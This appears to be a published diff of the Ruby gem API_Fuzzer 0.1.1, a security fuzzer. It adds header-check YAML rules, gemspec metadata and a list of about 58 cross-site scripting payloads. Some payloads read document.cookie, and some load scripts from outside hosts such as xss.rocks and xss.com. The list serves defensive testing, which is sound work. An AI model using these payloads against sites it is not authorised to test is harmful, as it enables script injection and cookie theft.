API_Fuzzer 0.1.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,58 @@
1
+ ' onmouseover=alert(/Black.Spook/)
2
+ ";eval(unescape(location))//# %0Aalert(0)
3
+ "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
4
+ "><iframe%20src="http://google.com"%%203E
5
+ "><img src=x onerror=prompt(1);>
6
+ &lt;IMG """><SCRIPT>alert("XSS")</SCRIPT>">
7
+ &lt;SCRIPT SRC=//xss.rocks/.j>
8
+ '); alert('XSS
9
+ "><script>alert(1)</script>
10
+ \";alert('XSS');//
11
+ <%<!--'%><script>alert(1);</script -->
12
+ <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
13
+ <--`<img/src=` onerror=alert(1)> --!>
14
+ <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
15
+ <<scr\0ipt/src=http://xss.com/xss.js></script
16
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
17
+ <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
18
+ <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
19
+ <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
20
+ <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
21
+ <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
22
+ <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
23
+ <a onmouseover="alert(document.cookie)">xxs link</a>
24
+ <a onmouseover=alert(document.cookie)>xxs link</a>
25
+ <iframe/onreadystatechange=alert(1)
26
+ <iframe/src \/\/onload = prompt(1)
27
+ <IMG DYNSRC=\"javascript:alert('XSS')\">
28
+ <IMG onmouseover="alert('xxs')">
29
+ <img src ?itworksonchrome?\/onerror = alert(1)???
30
+ <IMG SRC= onmouseover="alert('xxs')">
31
+ <IMG SRC=" &#14; javascript:alert('XSS');">
32
+ <img src="/" =_=" title="onerror='prompt(1)'">
33
+ <IMG SRC="jav&#x09;ascript:alert('XSS');">
34
+ <IMG SRC="jav&amp;#x09;ascript:alert('XSS');">
35
+ <IMG SRC="jav&amp;#x0A;ascript:alert('XSS');">
36
+ <IMG SRC="jav&amp;#x0D;ascript:alert('XSS');">
37
+ <IMG SRC="javascript:alert('XSS')"
38
+ <img src="javascript:alert('XSS')">
39
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
40
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
41
+ <img src=`xx:xx`onerror=alert(1)>
42
+ <svg contentScriptType=text/vbs><script>MsgBox+1
43
+ <svg/onload=alert(1)
44
+ <svg><script ?>alert(1)
45
+ <svg><script onlypossibleinopera:-)> alert(1)
46
+ <svg><script>//&NewLine;confirm(1);</script </svg>
47
+ <textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
48
+ <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
49
+ <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
50
+ <var onmouseover="prompt(1)">On Mouse Over</var>?
51
+ http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
52
+ http://www.<script>alert(1)</script .com
53
+ https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
54
+ javascript:alert%28/xss/%29
55
+ javascript:alert(1)
56
+ PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
57
+ x”</title><img src%3dx onerror%3dalert(1)>
58
+ [[#%3Cscript%3Ealert(1)%3C/script%3E|
@@ -0,0 +1,17 @@
1
+ ---
2
+ rules:
3
+
4
+ -
5
+ description: X-XSS Protection Header is not set properly
6
+ name: x-xss-protection
7
+ match: \A[01](; mode=block)?(; report=.*)?\z
8
+
9
+ -
10
+ description: Possible Clickjacking Vulnerability
11
+ name: x-frame-options
12
+ match: \A(SAMEORIGIN\z|DENY\z)
13
+
14
+ -
15
+ description: HSTS protection is not enabled in service
16
+ name: strict-transport-security
17
+ match: \Amax-age=\d+(; includeSubdomains)?(; preload)?\z
@@ -0,0 +1,21 @@
1
+ ---
2
+ rules:
3
+
4
+ -
5
+ #Server
6
+ description: Information Disclosure of Server version
7
+ match: server
8
+ -
9
+ # Powered-by Header
10
+ description: Information Disclosure through x-powered-by
11
+ match: x-powered-by
12
+
13
+ -
14
+ # ASP.NET MVC version
15
+ description: Information Disclosure of APS.NET MVC version
16
+ match: x-aspnetmvc-version
17
+
18
+ -
19
+ # ASP.NET version
20
+ description: Information Disclosure of ASP.NET version
21
+ match: x-aspnet-version
metadata ADDED
@@ -0,0 +1,163 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: API_Fuzzer
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.1
5
+ platform: ruby
6
+ authors:
7
+ - Lalith Rallabhandi
8
+ autorequire:
9
+ bindir: exe
10
+ cert_chain: []
11
+ date: 2016-10-14 00:00:00.000000000 Z
12
+ dependencies:
13
+ - !ruby/object:Gem::Dependency
14
+ name: http
15
+ requirement: !ruby/object:Gem::Requirement
16
+ requirements:
17
+ - - ~>
18
+ - !ruby/object:Gem::Version
19
+ version: '2.0'
20
+ type: :runtime
21
+ prerelease: false
22
+ version_requirements: !ruby/object:Gem::Requirement
23
+ requirements:
24
+ - - ~>
25
+ - !ruby/object:Gem::Version
26
+ version: '2.0'
27
+ - !ruby/object:Gem::Dependency
28
+ name: activesupport
29
+ requirement: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - '>='
32
+ - !ruby/object:Gem::Version
33
+ version: '0'
34
+ type: :runtime
35
+ prerelease: false
36
+ version_requirements: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - '>='
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ - !ruby/object:Gem::Dependency
42
+ name: rails
43
+ requirement: !ruby/object:Gem::Requirement
44
+ requirements:
45
+ - - '>='
46
+ - !ruby/object:Gem::Version
47
+ version: '4.2'
48
+ type: :runtime
49
+ prerelease: false
50
+ version_requirements: !ruby/object:Gem::Requirement
51
+ requirements:
52
+ - - '>='
53
+ - !ruby/object:Gem::Version
54
+ version: '4.2'
55
+ - !ruby/object:Gem::Dependency
56
+ name: bundler
57
+ requirement: !ruby/object:Gem::Requirement
58
+ requirements:
59
+ - - ~>
60
+ - !ruby/object:Gem::Version
61
+ version: '1.12'
62
+ type: :development
63
+ prerelease: false
64
+ version_requirements: !ruby/object:Gem::Requirement
65
+ requirements:
66
+ - - ~>
67
+ - !ruby/object:Gem::Version
68
+ version: '1.12'
69
+ - !ruby/object:Gem::Dependency
70
+ name: rake
71
+ requirement: !ruby/object:Gem::Requirement
72
+ requirements:
73
+ - - ~>
74
+ - !ruby/object:Gem::Version
75
+ version: '10.0'
76
+ type: :development
77
+ prerelease: false
78
+ version_requirements: !ruby/object:Gem::Requirement
79
+ requirements:
80
+ - - ~>
81
+ - !ruby/object:Gem::Version
82
+ version: '10.0'
83
+ - !ruby/object:Gem::Dependency
84
+ name: minitest
85
+ requirement: !ruby/object:Gem::Requirement
86
+ requirements:
87
+ - - ~>
88
+ - !ruby/object:Gem::Version
89
+ version: '5.0'
90
+ type: :development
91
+ prerelease: false
92
+ version_requirements: !ruby/object:Gem::Requirement
93
+ requirements:
94
+ - - ~>
95
+ - !ruby/object:Gem::Version
96
+ version: '5.0'
97
+ description: APIFuzzer gem builds api for finding security issues through a fuzzer
98
+ email:
99
+ - lalithr95@gmail.com
100
+ executables: []
101
+ extensions: []
102
+ extra_rdoc_files: []
103
+ files:
104
+ - .gitignore
105
+ - .travis.yml
106
+ - API_Fuzzer.gemspec
107
+ - CODE_OF_CONDUCT.md
108
+ - Gemfile
109
+ - LICENSE.txt
110
+ - README.md
111
+ - Rakefile
112
+ - app/controllers/ping_controller.rb
113
+ - bin/console
114
+ - bin/setup
115
+ - config/routes.rb
116
+ - lib/API_Fuzzer.rb
117
+ - lib/API_Fuzzer/csrf_check.rb
118
+ - lib/API_Fuzzer/engine.rb
119
+ - lib/API_Fuzzer/error.rb
120
+ - lib/API_Fuzzer/header_info.rb
121
+ - lib/API_Fuzzer/idor_check.rb
122
+ - lib/API_Fuzzer/privilege_escalation_check.rb
123
+ - lib/API_Fuzzer/rate_limit_check.rb
124
+ - lib/API_Fuzzer/redirect_check.rb
125
+ - lib/API_Fuzzer/request.rb
126
+ - lib/API_Fuzzer/resource_info.rb
127
+ - lib/API_Fuzzer/sql_blind_check.rb
128
+ - lib/API_Fuzzer/sql_check.rb
129
+ - lib/API_Fuzzer/version.rb
130
+ - lib/API_Fuzzer/vulnerability.rb
131
+ - lib/API_Fuzzer/xss_check.rb
132
+ - lib/API_Fuzzer/xxe_check.rb
133
+ - payloads/blind_sql.txt
134
+ - payloads/detect/sql.txt
135
+ - payloads/sql.txt
136
+ - payloads/xss.txt
137
+ - rules/headers.yml
138
+ - rules/info.yml
139
+ homepage: https://github.com/lalithr95/API-Fuzzer
140
+ licenses:
141
+ - MIT
142
+ metadata: {}
143
+ post_install_message:
144
+ rdoc_options: []
145
+ require_paths:
146
+ - lib
147
+ required_ruby_version: !ruby/object:Gem::Requirement
148
+ requirements:
149
+ - - '>='
150
+ - !ruby/object:Gem::Version
151
+ version: '0'
152
+ required_rubygems_version: !ruby/object:Gem::Requirement
153
+ requirements:
154
+ - - '>='
155
+ - !ruby/object:Gem::Version
156
+ version: '0'
157
+ requirements: []
158
+ rubyforge_project:
159
+ rubygems_version: 2.6.6
160
+ signing_key:
161
+ specification_version: 4
162
+ summary: APIFuzzer gem builds api for finding security issues through a fuzzer
163
+ test_files: []